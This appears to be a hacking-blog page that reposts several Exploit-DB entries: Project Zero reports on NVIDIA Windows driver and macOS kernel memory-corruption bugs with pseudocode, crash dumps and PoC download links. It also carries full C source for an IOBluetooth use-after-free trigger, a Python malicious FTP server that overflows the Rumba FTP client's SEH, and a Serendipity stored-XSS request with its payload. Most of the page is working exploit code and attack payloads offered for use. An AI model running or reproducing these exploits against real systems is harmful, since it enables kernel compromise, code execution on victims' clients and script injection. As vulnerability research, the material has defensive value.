Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=911
The DxgkDdiEscape handler for 0x600000D passes an unchecked user provided
pointer as the destination for a memcpy call. This leads to kernel memory
corruption.
(Win 10 x64 372.54) crashing context with PoC:
SYSTEM_SERVICE_EXCEPTION (3b)
CONTEXT: ffffd000c076c8b0 -- (.cxr 0xffffd000c076c8b0)
rax=0000000000000880 rbx=0000000000000000 rcx=000000000000000f
rdx=bebe9ec057cc7d47 rsi=ffffd000c076d870 rdi=ffffe001990da008
rip=fffff8010f1eab00 rsp=ffffd000c076d2d8 rbp=ffffd000c076d360
r8=0000000000003ff1 r9=fffff8010f217d48 r10=fffff78000000008
r11=4141414141414141 r12=0000000000000000 r13=ffffe001990dbe88
r14=ffffe001945f1201 r15=0000000000004000
iopl=0 nv up ei pl nz ac pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010212
nvlddmkm+0x5dab00:
fffff801`0f1eab00 f3410f7f03 movdqu xmmword ptr [r11],xmm0 ds:002b:41414141`41414141=????????????????????????????????
Resetting default scope
To reproduce, compile the PoC as a x64 binary (requires WDK for D3DKMTEscape),
and run.
For completeness, it looks like many of the other escape handlers in the same function has similar issues with writing to user provided pointers in an unchecked way. This should have been fairly obvious as the code is very close to each other in the same function.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40659.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863583248
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=895
The DxgkDdiEscape handler for 0x7000194 doesn't do bounds checking with the
user provided lengths it receives. When these lengths are passed to memcpy,
overreads and memory corruption can occur.
void __fastcall escape_7000194(NvMiniportDeviceContext *ctx, Escape7000194 *escape_data)
...
alloc_0_ = ExAllocatePoolWithTag_(PagedPool, escape->size_0, 0x7061564Eu);
...
alloc_1 = ExAllocatePoolWithTag_(PagedPool, escape->size_1, 0x7061564Eu);
..
if ( (_BYTE)v11 ) {
memcpy(alloc_0, escape->buf_0, escape->size_0);
memcpy(alloc_1, escape->buf_2, escape->size_1);
}
v8 = Escape7Handler(0i64, dword_7DCB84, *(_DWORD *)(v3 + 24), 0x402C0105, &escape->data, 96);
v9 = v8;
if ( !(_BYTE)v11 && !v8 )
memcpy(escape->buf_0, alloc_0, escape->size_0);
...
The PoC I've provided causes an OOB read, but it should be possible to pass an
input that results in the third memcpy being executed instead of the first two,
which leads to kernel memory corruption (OOB write).
(Win 10 x64 372.54) crashing context with PoC:
PAGE_FAULT_IN_NONPAGED_AREA (5)
...
Some register values may be zeroed or incorrect.
rax=0000000000000007 rbx=0000000000000000 rcx=ffffc000f5220f80
rdx=fffffffff3d5509c rsi=0000000000000000 rdi=0000000000000000
rip=fffff8007d4dad66 rsp=ffffd00166b9d2a8 rbp=ffffc000e8f55038
r8=0000000000020fc0 r9=000000000006603e r10=0000000000020000
r11=ffffc000f5200000 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
nvlddmkm+0x5dad66:
fffff800`7d4dad66 f30f6f4c0ae0 movdqu xmm1,xmmword ptr [rdx+rcx-20h] ds:ffffc000`e8f75ffc=????????????????????????????????
Resetting default scope
To reproduce, compile the PoC as a x64 binary (requires linking with
setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes
as for it to work as the escape data must contain the right values (e.g. a
field that appears to be gpu bus device function). My PoC should hopefully set
all the right values for the machine it's running on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40658.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=894
The DxgkDdiEscape handler for 0x700010d accepts a user provided pointer as the
destination for a memcpy call, without doing any checks on said pointer.
void __fastcall escape_700010D(NvMiniportDeviceContext* ctx, NvEscapeData *escape)
{
...
v8 = escape->unknown_2;
if ( v8 == 1 )
{
data.size = escape->size;
data.buf = ExAllocatePoolWithTag((POOL_TYPE)512, 0xC08i64 * data.size, 0x7061564Eu);
v9 = Escape7Handler(0i64, dword_7DCB84, dword_7DCB84, 626, &data, 0x190);
}
...
else if ( escape->unknown_2 == 1 )
{
memcpy(escape->user_ptr, data.buf, 3080i64 * escape->size);
(Win 10 x64 372.54) crashing context with PoC (in memcpy) on a write to 0x4141414141414141:
SYSTEM_SERVICE_EXCEPTION (3b)
...
CONTEXT: ffffd0002d2ab5c0 -- (.cxr 0xffffd0002d2ab5c0)
rax=0000000000000001 rbx=ffffc0016c9b9b40 rcx=000000000000000f
rdx=bebe9ebf4b4e0ecf rsi=0000000000000001 rdi=000000007061564e
rip=fffff8005488ab00 rsp=ffffd0002d2abfe8 rbp=ffffd0002d2ac0f0
r8=0000000000000bf9 r9=ffffd00024014ac0 r10=0000000000000000
r11=4141414141414141 r12=0000000000000340 r13=fffff800542b0000
r14=ffffe0008fb2d000 r15=0000000000000001
iopl=0 nv up ei pl nz ac po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010216
nvlddmkm+0x5dab00:
fffff800`5488ab00 f3410f7f03 movdqu xmmword ptr [r11],xmm0 ds:002b:41414141`41414141=????????????????????????????????
To reproduce, compile the PoC as a x64 binary (requires linking with
setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes
as for it to work as the escape data must contain the right values (e.g. a
field that appears to be gpu bus device function). My PoC should hopefully set
all the right values for the machine it's running on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40657.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=892
The handler for the DxgkDdiEscape escape code 0x70000D4 has the following pseudocode:
void __fastcall escape_70000D4(NvMiniportDeviceContext *a1, NvEscapeData *a2)
{
Escape70000D4 *escape_data_; // rbx@1
PVOID alloc_buf; // rsi@1
unsigned int v4; // edi@1
__int64 user_ptr; // r14@4
DWORD *v6; // rbx@5
__int128 v7; // [rsp+40h] [rbp-38h]@1
__int128 v8; // [rsp+50h] [rbp-28h]@4
PVOID alloc_buf_; // [rsp+60h] [rbp-18h]@4
escape_data_ = (Escape70000D4 *)a2;
a2->unknown_rest[6] = 1;
LODWORD(v7) = 0;
memset((char *)&v7 + 4, 0, 0x24ui64);
alloc_buf = ExAllocatePoolWithTag_(PagedPool, escape_data_->user_ptr_size, 'paVN');
v4 = 0;
if ( !alloc_buf )
v4 = 0xFFFF;
if ( v4 )
goto LABEL_12;
HIDWORD(v8) = escape_data_->user_ptr_size;
alloc_buf_ = alloc_buf;
v4 = sub_625BC(0i64, dword_B1BB94, escape_data_->unknown_0, 0x83F30101, (__int64)&v7, 40);
user_ptr = escape_data_->user_ptr;
ProbeForWrite((PVOID)escape_data_->user_ptr, escape_data_->user_ptr_size, UserMode);
memcpy((void *)escape_data_->user_ptr, alloc_buf, escape_data_->user_ptr_size);
*(_OWORD *)&escape_data_->unknown_2 = v7;
*(_OWORD *)&escape_data_->unknown_4 = v8;
escape_data_->user_ptr = user_ptr;
if ( v4 )
{
LABEL_12:
v6 = &escape_data_->header.unknown_rest[6];
if ( v6 )
{
if ( v4 <= 0xFFFFF000 )
*v6 = -4096 - v4;
}
}
if ( alloc_buf )
ExFreePoolWithTag_(alloc_buf, 0x7061564Eu);
}
ExAllocatePoolWithTag is called with a user provided size to allocate a buffer, but the subsequent copying of said buffer to the user provided pointer doesn't make sense since the buffer is never initialised with any values. This means that a user mode program can leak uninitialised memory from arbitrarily-sized pool allocations.
########
Looks like I made an oversimplified analysis of the pseudocode in the report. The allocated buffer pointer is indeed passed off to the sub_625BC function (as part of a struct member on the stack) which eventually passes it to a bunch of other functions.
However, this doesn't change the fact that with the provided PoC, the pool allocated buffer still isn't being initialised and is copied into the user buffer unchanged.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40656.zip
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=880
The \\.\UVMLiteController device is created by the nvlddmkm.sys driver, and can be opened by any user. The driver handles various control codes for this device, but there is no validation for the input/output buffer and their sizes.
In addition to potential overreads on the input, the driver writes output directly to Irp->UserBuffer, which is the output pointer passed to DeviceIoControl() by the user. The IO control codes handled specify METHOD_BUFFERED, but the kernel does no validation that the output pointer is accessible by the user process if the user passes an output buffer size of 0.
This means that a user mode program can cause a write of (at least) the 32-bit values 0 or 31, or the 8-bit value 0 to any address given to the driver.
A PoC is attached that causes a bsod when the kernel tries to write to 0x4141414141414141+0x30.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40655.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=882
mach_ports_register is a kernel task port MIG method.
It's defined in MIG like this:
routine mach_ports_register(
target_task : task_t;
init_port_set : mach_port_array_t =
^array[] of mach_port_t);
Looking at the generated code for this we notice something kinda weird; here's the mach message structure
which actually gets sent:
typedef struct {
mach_msg_header_t Head;
// start of the kernel processed data
mach_msg_body_t msgh_body;
mach_msg_ool_ports_descriptor_t init_port_set;
// end of the kernel processed data
NDR_record_t NDR;
mach_msg_type_number_t init_port_setCnt;
} Request __attribute__((unused));
The message contains an OOL ports descriptor, which is expected, but also contains a separate init_port_setCnt value
even though the ool_ports_descriptor_t already has the correct length of the descriptor.
When the kernel process this ool ports descriptor in ipc_kmsg_copyin_ool_ports_descriptor it will kalloc a buffer large enough
for all the ports and then copyin and convert them all. It does this using the init_port_set.count value, not init_port_setCnt.
The generated MIG code however calls mach_ports_register like this:
OutP->RetCode = mach_ports_register(target_task, (mach_port_array_t)(In0P->init_port_set.address), In0P->init_port_setCnt);
without verifying that In0P->init_port_setCnt is equal to init_port_set.count.
This means that when we reach mach_ports_register lots of stuff goes wrong:
kern_return_t
mach_ports_register(
task_t task,
mach_port_array_t memory, <-- points to kalloc'ed buffer
mach_msg_type_number_t portsCnt) <-- completely controlled, not related to size of kalloc'ed buffer
{
ipc_port_t ports[TASK_PORT_REGISTER_MAX];
unsigned int i;
if ((task == TASK_NULL) ||
(portsCnt > TASK_PORT_REGISTER_MAX) ||
(portsCnt && memory == NULL))
return KERN_INVALID_ARGUMENT; <-- portsCnt must be >=1 && <= 3
for (i = 0; i < portsCnt; i++)
ports[i] = memory[i]; <-- if we only sent one OOL port but set portsCnt >1 this will read a mach_port_t (a pointer) out of bounds
for (; i < TASK_PORT_REGISTER_MAX; i++)
ports[i] = IP_NULL;
itk_lock(task);
if (task->itk_self == IP_NULL) {
itk_unlock(task);
return KERN_INVALID_ARGUMENT;
}
for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
ipc_port_t old;
old = task->itk_registered[i];
task->itk_registered[i] = ports[i];
ports[i] = old;
}
itk_unlock(task);
for (i = 0; i < TASK_PORT_REGISTER_MAX; i++)
if (IP_VALID(ports[i]))
ipc_port_release_send(ports[i]); <-- this can decrement the ref on a pointer which was read out of bounds if we call this function multiple times
if (portsCnt != 0)
kfree(memory,
(vm_size_t) (portsCnt * sizeof(mach_port_t))); <-- this can call kfree with the wrong size
return KERN_SUCCESS;
}
For this PoC I've patched the MIG generated code to always only send one OOL mach port but still set init_port_setCnt to a controlled value - you should see a kernel
panic decrementing an invalid reference or something like that.
This bug however could be exploited quite nicely to cause a mach_port_t UaF which could have all kinds of fun consequences (getting another task's task port for example!)
tested on OS X 10.11.6 (15G31) on MacBookPro10,1
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40654.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=831
IOSurfaceRootUserClient stores a task struct pointer (passed in via IOServiceOpen) in the field at +0xf0 without taking a reference.
By killing the corrisponding task we can free this pointer leaving the user client with a dangling pointer. We can get this pointer used
by calling the create_surface_fast_path external method which will try to read and use the memory map off of the free'd task struct.
This bug could be leveraged for kernel memory corruption and is reachable from interesting sandboxes including safari and chrome.
build: clang -o surfaceroot_uaf surfaceroot_uaf.c -framework IOKit
You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actually fault on the UaF - otherwise you might see some weird panics!
tested on OS X 10.11.5 (15F34) on MacBookAir5,2
#####################################
another PoC for "task_t considered harmful"
since 10.11.6 blocks us from creating userclients with other task's task ports
this time we create an IOSurface in the child and send back a send right to that
IOSurface to the parent (rather than sending the child's task port.)
The child then execs a suid-root binary which blocks on stderr and the parent
creates an IOSurface which maps any (writable?) page of the euid-0 process into theirs.
Overwrite a function pointer and win.
No race conditions because the task struct pointer is on the kernel heap, not the stack.
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40653.zip
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=830
When you create a new IOKit user client from userspace you call:
kern_return_t IOServiceOpen( io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect );
The owningTask mach port gets converted into a task struct pointer by the MIG deserialization code which then takes
a reference on the task, calls is_io_service_open_extended passing the task struct then drops its reference.
is_io_service_open_extended will then call through to any overriden newUserClient or initWithTask methods implemented
by the service.
If those services want to keep a pointer to the "owningTask" then it's very important that they actually take a reference.
We can actually pass any task port as the "owningTask" which means that if the userclient doesn't take a reference
we can easily pass the task port for another task, kill that task (freeing the task struct) then get the user client
to use the free'd task struct.
IOBluetoothHCIUserClient (userclient type 0 of IOBluetoothHCIController) can be instantiated by a regular user
and stores a raw task struct pointer at this+0xe0 without taking a reference.
This pointer is then used in IOBluetoothHCIUserClient::SimpleDispatchWL to build and manipulate IOMemoryDescriptors.
This PoC forks off a child which sends the parent back its task port then spins. The parent then creates a new IOBluetoothHCIUserClient
passing the child's task port as the owningTask then sigkills the child (freeing it's task struct.) The parent then invokes
an external method on the user client leading to the UaF.
The IOMemoryDescriptor code does sufficiently weird stuff with the task struct and the memory map hanging off it that
this bug is clearly exploitable as just a plain memory corruption issue but can probably be leveraged for more interesting
logic stuff too.
Note that bluetooth does have to be turned on for this PoC to work!
build: clang -o bluetooth_uaf bluetooth_uaf.c -framework IOKit
You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actually fault on the UaF - otherwise you might see some weird panics!
tested on OS X 10.11.5 (15F34) on MacBookAir5,2
*/
// ianbeer
/*
OS X kernel use-after-free in IOBluetoothFamily.kext
When you create a new IOKit user client from userspace you call:
kern_return_t IOServiceOpen( io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect );
The owningTask mach port gets converted into a task struct pointer by the MIG deserialization code which then takes
a reference on the task, calls is_io_service_open_extended passing the task struct then drops its reference.
is_io_service_open_extended will then call through to any overriden newUserClient or initWithTask methods implemented
by the service.
If those services want to keep a pointer to the "owningTask" then it's very important that they actually take a reference.
We can actually pass any task port as the "owningTask" which means that if the userclient doesn't take a reference
we can easily pass the task port for another task, kill that task (freeing the task struct) then get the user client
to use the free'd task struct.
IOBluetoothHCIUserClient (userclient type 0 of IOBluetoothHCIController) can be instantiated by a regular user
and stores a raw task struct pointer at this+0xe0 without taking a reference.
This pointer is then used in IOBluetoothHCIUserClient::SimpleDispatchWL to build and manipulate IOMemoryDescriptors.
This PoC forks off a child which sends the parent back its task port then spins. The parent then creates a new IOBluetoothHCIUserClient
passing the child's task port as the owningTask then sigkills the child (freeing it's task struct.) The parent then invokes
an external method on the user client leading to the UaF.
The IOMemoryDescriptor code does sufficiently weird stuff with the task struct and the memory map hanging off it that
this bug is clearly exploitable as just a plain memory corruption issue but can probably be leveraged for more interesting
logic stuff too.
Note that bluetooth does have to be turned on for this PoC to work!
build: clang -o bluetooth_uaf bluetooth_uaf.c -framework IOKit
You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actually fault on the UaF - otherwise you might see some weird panics!
tested on OS X 10.11.5 (15F34) on MacBookAir5,2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <libkern/OSAtomic.h>
#include <mach/mach.h>
#include <mach/mach_error.h>
#include <mach/mach_vm.h>
#include <mach/task.h>
#include <mach/task_special_ports.h>
#include <IOKit/IOKitLib.h>
#include <CoreFoundation/CoreFoundation.h>
#define MACH_ERR(str, err) do { \
if (err != KERN_SUCCESS) { \
mach_error("[-]" str "\n", err); \
exit(EXIT_FAILURE); \
} \
} while(0)
#define FAIL(str) do { \
printf("[-] " str "\n"); \
exit(EXIT_FAILURE); \
} while (0)
#define LOG(str) do { \
printf("[+] " str"\n"); \
} while (0)
/***************
* port dancer *
***************/
// set up a shared mach port pair from a child process back to its parent without using launchd
// based on the idea outlined by Robert Sesek here: https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html
// mach message for sending a port right
typedef struct {
mach_msg_header_t header;
mach_msg_body_t body;
mach_msg_port_descriptor_t port;
} port_msg_send_t;
// mach message for receiving a port right
typedef struct {
mach_msg_header_t header;
mach_msg_body_t body;
mach_msg_port_descriptor_t port;
mach_msg_trailer_t trailer;
} port_msg_rcv_t;
typedef struct {
mach_msg_header_t header;
} simple_msg_send_t;
typedef struct {
mach_msg_header_t header;
mach_msg_trailer_t trailer;
} simple_msg_rcv_t;
#define STOLEN_SPECIAL_PORT TASK_BOOTSTRAP_PORT
// a copy in the parent of the stolen special port such that it can be restored
mach_port_t saved_special_port = MACH_PORT_NULL;
// the shared port right in the parent
mach_port_t shared_port_parent = MACH_PORT_NULL;
void setup_shared_port() {
kern_return_t err;
// get a send right to the port we're going to overwrite so that we can both
// restore it for ourselves and send it to our child
err = task_get_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, &saved_special_port);
MACH_ERR("saving original special port value", err);
// allocate the shared port we want our child to have a send right to
err = mach_port_allocate(mach_task_self(),
MACH_PORT_RIGHT_RECEIVE,
&shared_port_parent);
MACH_ERR("allocating shared port", err);
// insert the send right
err = mach_port_insert_right(mach_task_self(),
shared_port_parent,
shared_port_parent,
MACH_MSG_TYPE_MAKE_SEND);
MACH_ERR("inserting MAKE_SEND into shared port", err);
// stash the port in the STOLEN_SPECIAL_PORT slot such that the send right survives the fork
err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, shared_port_parent);
MACH_ERR("setting special port", err);
}
mach_port_t recover_shared_port_child() {
kern_return_t err;
// grab the shared port which our parent stashed somewhere in the special ports
mach_port_t shared_port_child = MACH_PORT_NULL;
err = task_get_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, &shared_port_child);
MACH_ERR("child getting stashed port", err);
LOG("child got stashed port");
// say hello to our parent and send a reply port so it can send us back the special port to restore
// allocate a reply port
mach_port_t reply_port;
err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port);
MACH_ERR("child allocating reply port", err);
// send the reply port in a hello message
simple_msg_send_t msg = {0};
msg.header.msgh_size = sizeof(msg);
msg.header.msgh_local_port = reply_port;
msg.header.msgh_remote_port = shared_port_child;
msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
err = mach_msg_send(&msg.header);
MACH_ERR("child sending task port message", err);
LOG("child sent hello message to parent over shared port");
// wait for a message on the reply port containing the stolen port to restore
port_msg_rcv_t stolen_port_msg = {0};
err = mach_msg(&stolen_port_msg.header, MACH_RCV_MSG, 0, sizeof(stolen_port_msg), reply_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
MACH_ERR("child receiving stolen port\n", err);
// extract the port right from the message
mach_port_t stolen_port_to_restore = stolen_port_msg.port.name;
if (stolen_port_to_restore == MACH_PORT_NULL) {
FAIL("child received invalid stolen port to restore");
}
// restore the special port for the child
err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, stolen_port_to_restore);
MACH_ERR("child restoring special port", err);
LOG("child restored stolen port");
return shared_port_child;
}
mach_port_t recover_shared_port_parent() {
kern_return_t err;
// restore the special port for ourselves
err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, saved_special_port);
MACH_ERR("parent restoring special port", err);
// wait for a message from the child on the shared port
simple_msg_rcv_t msg = {0};
err = mach_msg(&msg.header,
MACH_RCV_MSG,
0,
sizeof(msg),
shared_port_parent,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
MACH_ERR("parent receiving child hello message", err);
LOG("parent received hello message from child");
// send the special port to our child over the hello message's reply port
port_msg_send_t special_port_msg = {0};
special_port_msg.header.msgh_size = sizeof(special_port_msg);
special_port_msg.header.msgh_local_port = MACH_PORT_NULL;
special_port_msg.header.msgh_remote_port = msg.header.msgh_remote_port;
special_port_msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(msg.header.msgh_bits), 0) | MACH_MSGH_BITS_COMPLEX;
special_port_msg.body.msgh_descriptor_count = 1;
special_port_msg.port.name = saved_special_port;
special_port_msg.port.disposition = MACH_MSG_TYPE_COPY_SEND;
special_port_msg.port.type = MACH_MSG_PORT_DESCRIPTOR;
err = mach_msg_send(&special_port_msg.header);
MACH_ERR("parent sending special port back to child", err);
return shared_port_parent;
}
/*** end of port dancer code ***/
void do_child(mach_port_t shared_port) {
kern_return_t err;
// create a reply port to receive an ack that we should exec the target
mach_port_t reply_port;
err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port);
MACH_ERR("child allocating reply port", err);
// send our task port to our parent over the shared port
port_msg_send_t msg = {0};
msg.header.msgh_size = sizeof(msg);
msg.header.msgh_local_port = reply_port;
msg.header.msgh_remote_port = shared_port;
msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE) | MACH_MSGH_BITS_COMPLEX;
msg.body.msgh_descriptor_count = 1;
msg.port.name = mach_task_self();
msg.port.disposition = MACH_MSG_TYPE_COPY_SEND;
msg.port.type = MACH_MSG_PORT_DESCRIPTOR;
err = mach_msg_send(&msg.header);
MACH_ERR("child sending task port message", err);
LOG("child sent task port back to parent");
// spin and let our parent kill us
while(1){;}
}
mach_port_t do_parent(mach_port_t shared_port) {
kern_return_t err;
// wait for our child to send us its task port
port_msg_rcv_t msg = {0};
err = mach_msg(&msg.header,
MACH_RCV_MSG,
0,
sizeof(msg),
shared_port,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
MACH_ERR("parent receiving child task port message", err);
mach_port_t child_task_port = msg.port.name;
if (child_task_port == MACH_PORT_NULL) {
FAIL("invalid child task port");
}
LOG("parent received child's task port");
return child_task_port;
}
io_connect_t get_connection(mach_port_t task_port) {
kern_return_t err;
mach_port_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
if (service == MACH_PORT_NULL) {
printf("unable to get service\n");
return MACH_PORT_NULL;
}
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, task_port, 0, &conn); // 1 = IOBluetoothHCIUserClient
if (err != KERN_SUCCESS){
printf("IOServiceOpen failed: %s\n", mach_error_string(err));
conn = MACH_PORT_NULL;
}
IOObjectRelease(service);
return conn;
}
void trigger(int child_pid, mach_port_t child_task_port) {
kern_return_t err;
// get the userclient passing the child's task port
io_connect_t conn = get_connection(child_task_port);
if (conn == MACH_PORT_NULL){
printf("unable to get connection\n");
return;
}
printf("got user client\n");
// drop our ref on the child_task_port
mach_port_deallocate(mach_task_self(), child_task_port);
// kill the child, free'ing its task struct
kill(child_pid, 9);
int status;
wait(&status);
printf("killed child\n");
// make an external method call which will use that free'd task struct
char struct_input[0x74] = {0};
//+0x70 dword = index into sroutines
//+0x38 dword = size of first argument
//+0x0 qword = pointer to first argument
struct_input[0x38] = 0x80;
*(uint64_t*)(&struct_input[0]) = 0x414141414141;
err = IOConnectCallMethod(conn,
0,
NULL,
0,
struct_input,
0x74,
NULL,
NULL,
NULL,
NULL);
MACH_ERR("making external method call", err);
}
int main(int argc, char** argv) {
setup_shared_port();
pid_t child_pid = fork();
if (child_pid == -1) {
FAIL("forking");
}
if (child_pid == 0) {
mach_port_t shared_port_child = recover_shared_port_child();
do_child(shared_port_child);
} else {
mach_port_t shared_port_parent = recover_shared_port_parent();
mach_port_t child_task_port = do_parent(shared_port_parent);
trigger(child_pid, child_task_port);
}
return 0;
}
# Exploit Title: Rumba FTP 4.x Client Stackoverflow SEH
# Date: 29-10-2016
# Exploit Author: Umit Aksu
# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28731.rumba-ftp-4-x-security-update.aspx
# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40307
# Version: 4.x
# Tested on: Windows 7
# CVE : CVE-2016-5764
1. Description
Micro Focus Rumba FTP Client 4.x cannt handle long directory names. An attacker can setup a malicious FTP server that can send a long directory name which can led to remote code execution
on connected client.
2. Proof of Concept
The code below can be used to setup a malicious FTP server that will send a long directory name and overwrite the stack. The PoC only overwrites the SEH + NSEH.
3. PoC Code
------------------- Server.py --------------------------
import socket
import sys
import time
# IP Address
IP = '127.0.0.1' \
''
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = (IP,21)
print "Starting up on %s port %s" % server_address
sock.bind(server_address)
# Listen for incoming connections
sock.listen(1)
# Wait for incoming connection
while True:
print "Waiting for a connection"
connection, client_address = sock.accept()
try:
print "Connection from " + str(client_address)
# Receive the data in small chunks and restransmit it
connection.send("220 Welcome\r\n")
while(True):
data = connection.recv(16)
print "received %s" % data
if "USER" in data:
print "Sending 331"
connection.send("331 Please specify the password.\r\n")
if "PASS" in data:
print "Sending 227"
connection.send("230 Login successful.\n\n")
if "PWD" in data:
print "Sending 257"
# 77A632E2 add esp,908 pop pop pop ret
# THIS IS THE PART WHERE THE OVERFLOW HAPPENS
connection.send("257 \"/"+"A"*629+"\x45\x45\x45\x45"+ "\x44\x44\x44\x44" + "D"*185 + "rrrr" + "D"*211 + "\"\r\n")
if "TYPE A" in data:
print "Sending 200 Switching to ASCII mode."
connection.send("200 Switching to ASCII mode.\r\n")
if "TYPE I" in data:
print "Sending 200 Switching to Binary mode."
connection.send("200 200 Switching to Binary mode.\r\n")
if "SYST" in data:
print "Sending 215"
connection.send("215 UNIX Type: L8\r\n")
if "SIZE" in data:
print "Sending 200"
connection.send("200 Switching to Binary mode. \r\n")
if "FEAT" in data:
print "Sending 211-Features"
connection.send("211-Features:\r\n EPRT\r\n EPSV\r\n MDTM\r\n PASV\r\n REST STREAM\r\n SIZE\r\n TVFS\r\n211 End\r\n")
if "CWD" in data:
print "Sending 250 Directory successfully changed."
connection.send("250 Directory successfully changed.\r\n")
if "PASV" in str(data):
print "Sending 227 Entering Passive Mode (130,161,45,252,111,183)\n\n"
connection.send("227 Entering Passive Mode (130,161,45,252,111,183)\n\n")
# Listen on new socket for connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
#Bind socket to local host and port
try:
s.bind((IP, 28599))
except socket.error as msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind complete for PASV on port 28599'
#Start listening on socket
s.listen(10)
print 'Socket now listening on 28599'
#now keep talking with the client
#wait to accept a connection - blocking call
conn, addr = s.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1])
time.sleep(1)
print "Sending dir list"
connection.send("150 Here comes the directory listing.\r\n")
conn.send("d"*500+"rwx------ 2 500 500 4096 Nov 05 2007 " + "A." + "B"*500 + "\r\n")
# Send ok to ftp client
connection.send("226 Directory send OK.\r\n")
# close the connection
s.close()
conn.close()
break
if "EXIT" in str(data):
print "REC"
connection.send("Have a nice day!\r\n")
break
finally:
connection.close()
========================================
Title: Serendipity-2.0.4 (latest version) - Stored Cross Site Scripting
Application: Serendipity
Class: Sensitive Information disclosure
Versions Affected: <= latest version
Vendor URL: http://docs.s9y.org/
Software URL: http://docs.s9y.org/downloads.html
Bugs: Persistent Cross Site Scripting
Date of found: 29.10.2016
Author: Besim
========================================
2.CREDIT
========================================
Those vulnerabilities was identified by Meryem AKDOĞAN and Besim ALTINOK
3. VERSIONS AFFECTED
========================================
<= latest version
4. TECHNICAL DETAILS & POC
========================================
Stored Cross Site Scripting (No Admin Required)
========================================
1) Editor login panel
2) User click 'New Entry'
3) Attacker(normal user) enter xss payload to 'Entry Body' input
4) Vulnerability Parameter and Payload : &body=<Script>alert('Meryem ExploitDB')</Script>
### HTTP Request ###
POST /serendipity/serendipity_admin.php? HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
Cookie: ---
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 762
- POST DATA
serendipity[action]=admin
&serendipity[adminModule]=entries
&serendipity[adminAction]=save
&serendipity[id]=
&serendipity[timestamp]=1477314176
&serendipity[preview]=false
&serendipity[token]=324fa32a404e03de978d9a18f86a3338
&serendipity[title]=New Page
&serendipity[body]=<Script>alert('Meryem ExploitDB')</Script>
&serendipity[extended]=
&serendipity[chk_timestamp]=1477314176
